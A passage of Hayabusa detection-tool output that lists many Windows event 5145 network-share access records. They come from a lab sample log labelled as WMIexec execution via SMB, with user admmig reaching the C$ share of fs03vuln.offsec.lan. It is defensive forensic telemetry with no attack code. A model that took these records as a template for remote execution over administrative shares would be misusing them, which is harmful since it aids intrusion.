| IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.360 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.360 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.360 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.409 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.435 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.450 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.450 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.466 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.482 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.497 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.497 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.529 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.544 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.575 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.607 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 